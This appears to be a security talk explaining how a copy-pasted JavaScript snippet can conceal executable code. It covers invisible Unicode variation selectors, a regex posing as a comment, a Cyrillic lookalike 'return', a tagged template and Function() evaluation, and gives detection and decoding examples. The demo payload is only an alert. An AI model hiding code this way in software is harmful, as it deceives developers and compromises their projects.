CSP weakness:
it only checks origins, not effects
JavaScript devs who are either amateurs
or pros who don't use it as their main language
Most of the JavaScript code running in a project
is not written by the project's authors:
it comes from dependencies or is copy-pasted
Oh, this is simple.
I understand this
I don't understand this,
but it looks important.
Better keep this comment
Unicode Variation Selectors, which select a glyph variant of the preceding character, can serve as zero-width characters.
Without any preceding character, they are invisible!
Variation Selectors:
FE00 - FE0F
(16 chars, 2 bytes)
UTF-16 surrogates = 16x bigger range of characters!
using a high and a low surrogate, 4 bytes in total
Variation Selectors Supplement:
E0100 - E01EF
(240 chars, 4 bytes)
Codepoint = 10000₁₆ + (H - D800₁₆) × 400₁₆ + (L - DC00₁₆)
\uDB40\uDD61 = 10000₁₆ + 340₁₆ × 400₁₆ + 161₁₆ = E0161₁₆
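The formula above can be checked directly in JavaScript. This is a minimal sketch; the helper name `surrogatesToCodePoint` is made up for illustration, and the result is cross-checked against the built-in `String.prototype.codePointAt`.

```javascript
// Combine a UTF-16 surrogate pair into a code point, using the formula above.
function surrogatesToCodePoint(high, low) {
  return 0x10000 + (high - 0xD800) * 0x400 + (low - 0xDC00);
}

const decodedPoint = surrogatesToCodePoint(0xDB40, 0xDD61);
console.log(decodedPoint.toString(16).toUpperCase()); // E0161

// The built-in applies the same decoding to the pair.
console.log("\uDB40\uDD61".codePointAt(0) === decodedPoint); // true
```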
In the Variation Selectors Supplement block, most selectors are not used yet,
so they are invisible even when combined with a preceding character!
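Since both ranges are known, a source file can be scanned for them. The sketch below is one possible check, not an established tool; `findVariationSelectors` is a hypothetical helper name. A hit is not proof of malice on its own, since FE0F in particular is common in emoji sequences.

```javascript
// Matches both ranges listed above: FE00-FE0F and E0100-E01EF.
const VARIATION_SELECTORS = /[\uFE00-\uFE0F\u{E0100}-\u{E01EF}]/gu;

// Returns the position (in UTF-16 code units) and code point of every selector found.
function findVariationSelectors(source) {
  const hits = [];
  for (const match of source.matchAll(VARIATION_SELECTORS)) {
    hits.push({
      index: match.index,
      codePoint: "U+" + match[0].codePointAt(0).toString(16).toUpperCase(),
    });
  }
  return hits;
}

// The invisible character is built with fromCodePoint so it shows up in this listing.
const suspectLine = "/" + String.fromCodePoint(0xE0161) + "/ ; x = 1";
console.log(findVariationSelectors(suspectLine)); // one hit: index 1, U+E0161
console.log(findVariationSelectors("// ; x = 1").length); // 0
```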
Back to our StackOverflow bad guy...
What if we add syntax highlighting?
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
See, this is not a comment line like the lines before it.
I put a zero-width Unicode character between those slashes,
and now it is a regular expression!
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
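The difference between the two lines can be reproduced in isolation. This is a minimal sketch that builds both source strings explicitly, so the invisible character appears as a visible `fromCodePoint` call, and evaluates each with indirect `eval`; the variable names are illustrative.

```javascript
const invisibleChar = String.fromCodePoint(0xE0161);

const commentSource = "//";                      // an empty line comment
const regexSource = "/" + invisibleChar + "/";   // a regex literal with an invisible body

// Indirect eval runs each string as a standalone script.
const commentValue = (0, eval)(commentSource);
const regexValue = (0, eval)(regexSource);

console.log(commentValue);                 // undefined
console.log(regexValue instanceof RegExp); // true
console.log(regexSource.length);           // 4 (two slashes plus one surrogate pair)
```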
I want to execute malicious code on this line now, but first I need to end the RegExp statement. Here I simply used a semicolon (;)
disguised as formatting, but there are many other options...
/󠅡/ + (code)
/󠅡/ - (code)
/󠅡/ * (code)
/󠅡/ [ (code) ]
/󠅡// (code)
Some of these could confuse syntax highlighters as well!
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
This looks like the end of the comment on the previous line, but it is actually interpreted as a label, a little-known JS feature.
It has no other purpose than to confuse you
by imitating a real comment
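For readers who have never met labels, here is a small sketch of how they behave. The label name `instead` is taken from the snippet; the other names are illustrative.

```javascript
let greeting = "unset";

// "instead:" is a label, so the rest of the line is an ordinary assignment.
instead: greeting = "assigned";

console.log(greeting); // assigned

// The usual purpose of a label: leaving nested loops in one jump.
let steps = 0;
outer: for (let i = 0; i < 3; i++) {
  for (let j = 0; j < 3; j++) {
    steps++;
    if (j === 1) break outer;
  }
}
console.log(steps); // 2
```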
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
return is a reserved keyword in JavaScript, and cannot be reassigned
At this point, the dev should be convinced this is a harmless comment
Except...
This return uses the Cyrillic "е", which is visually indistinguishable from the Latin one.
Different code points = different JS identifiers
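This can be verified without relying on what the screen shows. The sketch below writes the Cyrillic letter as the escape `\u0435` so it is visible in the listing, then asks the parser whether each spelling is accepted as a variable name; the variable names are illustrative.

```javascript
const latinName = "return";
const lookalikeName = "r\u0435turn"; // U+0435 CYRILLIC SMALL LETTER IE instead of "e"

console.log(latinName === lookalikeName); // false
console.log(lookalikeName.length);        // 6

// The lookalike is accepted as a variable name...
const lookalikeValue = new Function(
  `var ${lookalikeName} = 7; return ${lookalikeName};`
)();
console.log(lookalikeValue); // 7

// ...while the real keyword is rejected by the parser.
let keywordRejected = false;
try {
  new Function("var return = 7;");
} catch (err) {
  keywordRejected = err instanceof SyntaxError;
}
console.log(keywordRejected); // true
```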
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
The same fake return is used here to call this function as a
tagged template literal, another little-known JS feature.
When a keyword like return is faked,
this kind of function call is indistinguishable
from regular string manipulation
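As a reminder of how tagged templates pass their arguments, here is a minimal sketch. The tag name `inspectTemplate` is hypothetical; the second call mirrors the `([who])` destructuring from the snippet, which picks the first literal chunk rather than the interpolated value.

```javascript
// A tag function receives the literal chunks first, then each interpolated value.
function inspectTemplate(strings, ...values) {
  return { strings: [...strings], values };
}

const who = "world";
const inspected = inspectTemplate`Hello ${who}`;

console.log(inspected.strings); // [ 'Hello ', '' ]
console.log(inspected.values);  // [ 'world' ]

// Array destructuring on the first parameter grabs the first literal chunk.
const firstChunk = (([chunk]) => chunk)`Hello ${who}`;
console.log(JSON.stringify(firstChunk)); // "Hello "
```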
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
This should catch your attention...
This is a dynamic code evaluation pattern
But to evaluate what code?
Function("alert('evil')")()
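The same pattern with a harmless body shows what `Function` does: it compiles a string into a callable function at runtime. A minimal sketch with illustrative names:

```javascript
// Leading arguments are parameter names; the last argument is the function body.
const add = Function("a", "b", "return a + b");
console.log(add(2, 3)); // 5

// With a single argument, the string is the whole body, called immediately here.
const bodySource = "return 6 * 7";
const bodyResult = Function(bodySource)();
console.log(bodyResult); // 42
```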
// ; === Say hello to someone ===
// ; argument = String
// ; return = String
// ; NOTE: If you have a bug with character encoding, you should use this
/󠅡/ ; instead: rеturn = ([who])=>{Function(unescape(escape(who).replace(/u.{8}/g,'')))()}
function hello(who){
rеturn `󠅡󠅬󠅥󠅲󠅴󠄨󠄢󠄰󠅷󠅎󠅥󠅄󠄠󠅢󠅙󠄠󠅈󠄴󠅣󠅫󠄳󠅲󠅚󠄠󠄢󠄩󠄻󠄊Hello ${who}`
}
hello("world")
escape(who).replace(/u.{8}/g,'')
%uDB40%uDD61 → %61, and unescape("%61") = "a"
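The whole round trip can be reproduced with a harmless payload. This is a sketch under stated assumptions: `hide` and `reveal` are hypothetical helper names, the hidden text is plain ASCII with codes below F0₁₆ so that it fits in E0100 - E01EF, and the visible text contains no "u" followed by eight characters. `escape` and `unescape` are legacy functions, used here only because the snippet relies on them.

```javascript
// Map each ASCII character onto an invisible Variation Selectors Supplement character.
function hide(text) {
  return Array.from(text, (ch) =>
    String.fromCodePoint(0xE0100 + ch.charCodeAt(0))
  ).join("");
}

// Same extraction as the snippet: drop "uDB40%uDD" from each escaped surrogate pair.
function reveal(text) {
  return unescape(escape(text).replace(/u.{8}/g, ""));
}

const carrier = hide("1 + 1") + "Hi";

console.log(carrier.length);    // 12 (five hidden pairs plus "Hi")
console.log(escape(hide("a"))); // %uDB40%uDD61
console.log(reveal(carrier));   // 1 + 1Hi
```

Only the decoding step is shown; the revealed text is printed, not executed.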
This is just a basic demonstration